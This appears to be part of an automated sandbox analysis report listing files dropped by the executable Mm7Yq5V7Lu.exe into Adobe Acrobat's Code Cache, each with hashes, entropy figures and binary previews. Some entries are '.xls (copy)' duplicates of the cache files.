                                                                                                                                                      Preview: .......0ZK...RC..cG...`<..+.6GG.T....C..\2Hm...y....V.J..Kg.3....m. ...q.(&...`...u[x...Y.i.I7...L..Hy.J.6......[\[...L...`V.@.......Zy. 56.G..Usp5"..l...,..2..!.\G..O=j....C.E.t..Q..iU....cc.U...M.R*r.:.G.......d..z.j..C.u.\..K.j.......]Jq..DfJ.....y:.z.."W..T.f.....Di..U.A......y!.[@@..&'.U.....N..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.642925221225804
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:INLDGfdYO5zK8sevWAVgKTaCB7RZ0cHYIgtyUznMG:mDGfdYIzCwgck38tG
                                                                                                                                                      MD5:1BFD6AD685ACE3D975722BF42BE534B1
                                                                                                                                                      SHA1:DAEFF1232358FBF56AD6D27854E4D02749F2AD2E
                                                                                                                                                      SHA-256:0EA9FE19ACE592600AAF7A599AA5C50DB678640DDD240C9E4CEF6FD91D07D881
                                                                                                                                                      SHA-512:9BD6C58BB34A95CABB0909E87DB9170E8DD37F9BA1FAC9DC973B8B5C533F3B59CABE1625CE6AE6071E0DCEA83F9D2B279EE1F309439F84CE476F32C62A3D6DC4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .......0ZK...RC..cG...`<..+.6GG.T....C..\2Hm...y....V.J..Kg.3....m. ...q.(&...`...u[x...Y.i.I7...L..Hy.J.6......[\[...L...`V.@.......Zy. 56.G..Usp5"..l...,..2..!.\G..O=j....C.E.t..Q..iU....cc.U...M.R*r.:.G.......d..z.j..C.u.\..K.j.......]Jq..DfJ.....y:.z.."W..T.f.....Di..U.A......y!.[@@..&'.U.....N..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.775875543489954
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:X3HAI2axaPhSyg+7b/zK8sevWAVgKTaCB7RZ0cHYIgtyUzCeT:HHA7ahyXzCwgck38+
                                                                                                                                                      MD5:0B7FC6614E5D7CA504CB547C7BBE27B0
                                                                                                                                                      SHA1:ECCF02FCA137C185C5711BD947B4F35311E3581B
                                                                                                                                                      SHA-256:38A4B34CF973390CBF520E9A898BAB79521391557CC418CF69FA9464C118463C
                                                                                                                                                      SHA-512:0BD4CDF97C13BBDBF22A9E194B5F4ECE0E4DF056EC39415FCF15340E3064C9F34D3AA49ADDA7A84F9F7B272BAF8163D608AE1D7222056A11EA9DA60C118A39D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .1..:OO......c.h..'m.......L.E<.$Pc.T:..f......;.....A.....j..d.1..._,..ka{..S...+..R..l...\,...R7..<c$3g...z........2...*R..Q ...2...<.#oi...P.A3w..."....T.X.....t]h.I......n....3..]..r...I'...x.....K....R....u.e......z....f.@++M...Q.M\..........`d...jQ...BR.N.V.....8f...vA.e.4.G.=..K...,D....;:G5B....C...9J7...;9.i.]..34.$.t2+.|67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.775875543489954
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:X3HAI2axaPhSyg+7b/zK8sevWAVgKTaCB7RZ0cHYIgtyUzCeT:HHA7ahyXzCwgck38+
                                                                                                                                                      MD5:0B7FC6614E5D7CA504CB547C7BBE27B0
                                                                                                                                                      SHA1:ECCF02FCA137C185C5711BD947B4F35311E3581B
                                                                                                                                                      SHA-256:38A4B34CF973390CBF520E9A898BAB79521391557CC418CF69FA9464C118463C
                                                                                                                                                      SHA-512:0BD4CDF97C13BBDBF22A9E194B5F4ECE0E4DF056EC39415FCF15340E3064C9F34D3AA49ADDA7A84F9F7B272BAF8163D608AE1D7222056A11EA9DA60C118A39D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .1..:OO......c.h..'m.......L.E<.$Pc.T:..f......;.....A.....j..d.1..._,..ka{..S...+..R..l...\,...R7..<c$3g...z........2...*R..Q ...2...<.#oi...P.A3w..."....T.X.....t]h.I......n....3..]..r...I'...x.....K....R....u.e......z....f.@++M...Q.M\..........`d...jQ...BR.N.V.....8f...vA.e.4.G.=..K...,D....;:G5B....C...9J7...;9.i.]..34.$.t2+.|67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.776032809936589
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Aow/QNV0XXCP6RnuzK8sevWAVgKTaCB7RZ0cHYIgtyUzO42Z33:AohuXC4nuzCwgck38fF33
                                                                                                                                                      MD5:A1580F67096EFD56931A490A717F114F
                                                                                                                                                      SHA1:A5C55E779BA0A4C98B2ABF92C57E8D3C364EC42B
                                                                                                                                                      SHA-256:70D6ABA8E91648773C7A58A6D51A5D76527A890DE22074B30E6FFF320FB20CE5
                                                                                                                                                      SHA-512:B78EEB22895EE1B05253119495C27FA49E98F2300CBE25A5B3989CB5A67CD9C57DC42EE49A86202CD258F582C84645CEC89B4D8812A3CF21D7B0FD0D08EB6020
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...i.[......F..#\.k....RZ"i..Y..YM..~.p...q.g.Y......a...D.....K..3.........>.....~F.B....HD.../..\.:!.A.w.PP...M..1...].Zn.M%j=...T.3.>...`.~.7z.....w^#.".`a..I..>\./.)...ih2..IC..K..SEWt^&p}....#. ~..T...Q5....#M../........Sm.6DT.~'9.....n.k;.TL.G+.U...C1..sM55.>.....D.s.v.w.Rg....l+.....C<..S.=x....U..I~~...(....Z.#k.l.c.x....2.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.776032809936589
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Aow/QNV0XXCP6RnuzK8sevWAVgKTaCB7RZ0cHYIgtyUzO42Z33:AohuXC4nuzCwgck38fF33
                                                                                                                                                      MD5:A1580F67096EFD56931A490A717F114F
                                                                                                                                                      SHA1:A5C55E779BA0A4C98B2ABF92C57E8D3C364EC42B
                                                                                                                                                      SHA-256:70D6ABA8E91648773C7A58A6D51A5D76527A890DE22074B30E6FFF320FB20CE5
                                                                                                                                                      SHA-512:B78EEB22895EE1B05253119495C27FA49E98F2300CBE25A5B3989CB5A67CD9C57DC42EE49A86202CD258F582C84645CEC89B4D8812A3CF21D7B0FD0D08EB6020
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...i.[......F..#\.k....RZ"i..Y..YM..~.p...q.g.Y......a...D.....K..3.........>.....~F.B....HD.../..\.:!.A.w.PP...M..1...].Zn.M%j=...T.3.>...`.~.7z.....w^#.".`a..I..>\./.)...ih2..IC..K..SEWt^&p}....#. ~..T...Q5....#M../........Sm.6DT.~'9.....n.k;.TL.G+.U...C1..sM55.>.....D.s.v.w.Rg....l+.....C<..S.=x....U..I~~...(....Z.#k.l.c.x....2.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.754410526670518
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dE/+LtPJJj729WtWw5SzK8sevWAVgKTaCB7RZ0cHYIgtyUzL:dE/uFXj72CWDzCwgck38K
                                                                                                                                                      MD5:20F583FC953697524271FD522D8E3AE7
                                                                                                                                                      SHA1:CDBBA2D30B25FE8DBCD45DC8BAF967E21874161C
                                                                                                                                                      SHA-256:DACBDB6C6FFE4A82BC9786E42E4C72FF9A447EC5D0E4FC125253694491BEB8E3
                                                                                                                                                      SHA-512:0F354CD55CE5E34402B5322D856D380D7A72B634E5709658A72AE897826A4BEA458323C76176C967F740F288E9201C150845A22AFE1D18B727D52A49DE918B73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: !..5.g.f.k.T..+KP...^.....+z....4..``...r..p..a.F.3&DV.4..../~..I..#.n.x..Hn,Q_...K..W.\7h..i..H../(9'dcZ.V...G..^....t.u..i.8....'.\r&.l.C.....ey1........}.\}0.....-...`.z.ZyX.msG.Z?..`iR2..\..4W..i..I..4....+gT.0.....s...HO.H..hN..:......vv.Z...W...0..#V.3..._.....T.q.OVB.KbN..CM..e.].uD...wpVy.w....C.....-.\7..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.754410526670518
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dE/+LtPJJj729WtWw5SzK8sevWAVgKTaCB7RZ0cHYIgtyUzL:dE/uFXj72CWDzCwgck38K
                                                                                                                                                      MD5:20F583FC953697524271FD522D8E3AE7
                                                                                                                                                      SHA1:CDBBA2D30B25FE8DBCD45DC8BAF967E21874161C
                                                                                                                                                      SHA-256:DACBDB6C6FFE4A82BC9786E42E4C72FF9A447EC5D0E4FC125253694491BEB8E3
                                                                                                                                                      SHA-512:0F354CD55CE5E34402B5322D856D380D7A72B634E5709658A72AE897826A4BEA458323C76176C967F740F288E9201C150845A22AFE1D18B727D52A49DE918B73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: !..5.g.f.k.T..+KP...^.....+z....4..``...r..p..a.F.3&DV.4..../~..I..#.n.x..Hn,Q_...K..W.\7h..i..H../(9'dcZ.V...G..^....t.u..i.8....'.\r&.l.C.....ey1........}.\}0.....-...`.z.ZyX.msG.Z?..`iR2..\..4W..i..I..4....+gT.0.....s...HO.H..hN..:......vv.Z...W...0..#V.3..._.....T.q.OVB.KbN..CM..e.].uD...wpVy.w....C.....-.\7..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.702689330687523
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KQ/DAL9OjG3b1FzK8sevWAVgKTaCB7RZ0cHYIgtyUzGs6:Ki0L9OjGhFzCwgck38q6
                                                                                                                                                      MD5:7E5AF0F5B68C5977B29DB5DB75E4C990
                                                                                                                                                      SHA1:7EC2DDFA7D873C5938355EC2678BBB0FF1F83DED
                                                                                                                                                      SHA-256:2F5E36EB1AA4FFC14C39EAEF310E26C01BFE74069A1D7BA45E006D361362DF7B
                                                                                                                                                      SHA-512:4F4C3A78CD681F95F33C9E7ADB77CE3D4FCDAD0FF90E880A58BE4BDEA3EF667CF06502C6702D83D284482EB7F4A8FF5736E9E1F4BDF4802CF0E6EA7CD8A2E7ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .X1.f..FB[E...h.....P.}.^.I.l...q.|Q...25tt..+L.....q......*(..$.](..m.r.`...`3..{V...i.4.3.....G....0.<.a~[.....l=....NMF...,.k6..u.....Z.h.Gx.>{...-pp........t.....5.O....}78....>..f:..D.y.8$...F.3..$j...tE.*y...d>;T.ULB.....L...>.3j.8.........).]...G...1.5.j....J#..US.E.>S:?.>..m.'z..1..a..y..e.5b<.6V..v...[..|w<.>.f.z(67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.702689330687523
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KQ/DAL9OjG3b1FzK8sevWAVgKTaCB7RZ0cHYIgtyUzGs6:Ki0L9OjGhFzCwgck38q6
                                                                                                                                                      MD5:7E5AF0F5B68C5977B29DB5DB75E4C990
                                                                                                                                                      SHA1:7EC2DDFA7D873C5938355EC2678BBB0FF1F83DED
                                                                                                                                                      SHA-256:2F5E36EB1AA4FFC14C39EAEF310E26C01BFE74069A1D7BA45E006D361362DF7B
                                                                                                                                                      SHA-512:4F4C3A78CD681F95F33C9E7ADB77CE3D4FCDAD0FF90E880A58BE4BDEA3EF667CF06502C6702D83D284482EB7F4A8FF5736E9E1F4BDF4802CF0E6EA7CD8A2E7ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .X1.f..FB[E...h.....P.}.^.I.l...q.|Q...25tt..+L.....q......*(..$.](..m.r.`...`3..{V...i.4.3.....G....0.<.a~[.....l=....NMF...,.k6..u.....Z.h.Gx.>{...-pp........t.....5.O....}78....>..f:..D.y.8$...F.3..$j...tE.*y...d>;T.ULB.....L...>.3j.8.........).]...G...1.5.j....J#..US.E.>S:?.>..m.'z..1..a..y..e.5b<.6V..v...[..|w<.>.f.z(67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.728980382050512
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:aXl7QRBEwN1DzK8sevWAVgKTaCB7RZ0cHYIgtyUzQG/Mcr:KQzEO1DzCwgck38nmMcr
                                                                                                                                                      MD5:B490F0F8B36E522103DAD9E3412DB282
                                                                                                                                                      SHA1:5002DC6C75F0ADBC0C6234D1409D0611D9A5D35B
                                                                                                                                                      SHA-256:EE3528CAF9E020839E7765E31BE515CF079875BAA8A8CEAACF506A05772F52D7
                                                                                                                                                      SHA-512:2AACD0361D396E2FFEC4B749D13693382E39C7534933E9EABC6857441CFD04CA45F8EDA77C94CA03F984F33D35366430E2FA398E712EAF1414687CC0E81DC134
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...;-...A2..*h...aq..*...p.{.8....d....B;.......2{jC...g.K5.....KiF:.....Y.....Lk.R.Ne...r......4?Q...I...4...A.. ]c....'......d..6[....U...^to..s..U.7......x$......=......S.@.S..-U=....>iSBM.."G....8....G.2B...C.i./.].K.....E...H8..@.....<..=..._..q3..5.}....R.=0..9.|.C..XJ..t.s.R....`.tqtJM*...G5f.',.....3.5.\..q..mT. ...o.U.z....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.728980382050512
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:aXl7QRBEwN1DzK8sevWAVgKTaCB7RZ0cHYIgtyUzQG/Mcr:KQzEO1DzCwgck38nmMcr
                                                                                                                                                      MD5:B490F0F8B36E522103DAD9E3412DB282
                                                                                                                                                      SHA1:5002DC6C75F0ADBC0C6234D1409D0611D9A5D35B
                                                                                                                                                      SHA-256:EE3528CAF9E020839E7765E31BE515CF079875BAA8A8CEAACF506A05772F52D7
                                                                                                                                                      SHA-512:2AACD0361D396E2FFEC4B749D13693382E39C7534933E9EABC6857441CFD04CA45F8EDA77C94CA03F984F33D35366430E2FA398E712EAF1414687CC0E81DC134
                                                                                                                                                      Malicious:false
